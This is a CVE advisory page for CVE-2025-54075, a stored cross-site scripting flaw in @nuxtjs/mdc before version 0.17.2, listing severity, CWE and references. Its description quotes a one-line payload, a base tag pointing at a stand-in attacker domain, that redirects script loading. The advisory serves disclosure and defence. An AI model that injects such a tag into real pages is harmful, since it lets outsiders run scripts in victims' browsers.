We use these services and cookies to improve your user experience. You may opt out if you wish, however, this may limit some features on this site.

Please see our statement on Data Privacy.

Crisp.chat (Helpdesk and Chat)

Ok

THREATINT
PUBLISHED

CVE-2025-54075

mdc vulnerable to XSS in markdown rendering bypassing HTML filter. (N°4)



Description

MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a `<base href="https://attacker.tld">` element. The `<base>` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context. Version 0.17.2 contains a fix for the issue.

Reserved 2025-07-16 | Published 2025-07-18 | Updated 2025-07-18 | Assigner GitHub_M


HIGH: 8.3CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Problem types

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Product status

< 0.17.2
affected

References

github.com/...es/mdc/security/advisories/GHSA-cj6r-rrr9-fg82

github.com/...ommit/3657a5bf2326a73cd3d906f57149146a412b962a

cve.org (CVE-2025-54075)

nvd.nist.gov (CVE-2025-54075)

Download JSON

Share this page
https://cve.threatint.eu/CVE/CVE-2025-54075

Support options

Helpdesk Chat, Email, Knowledgebase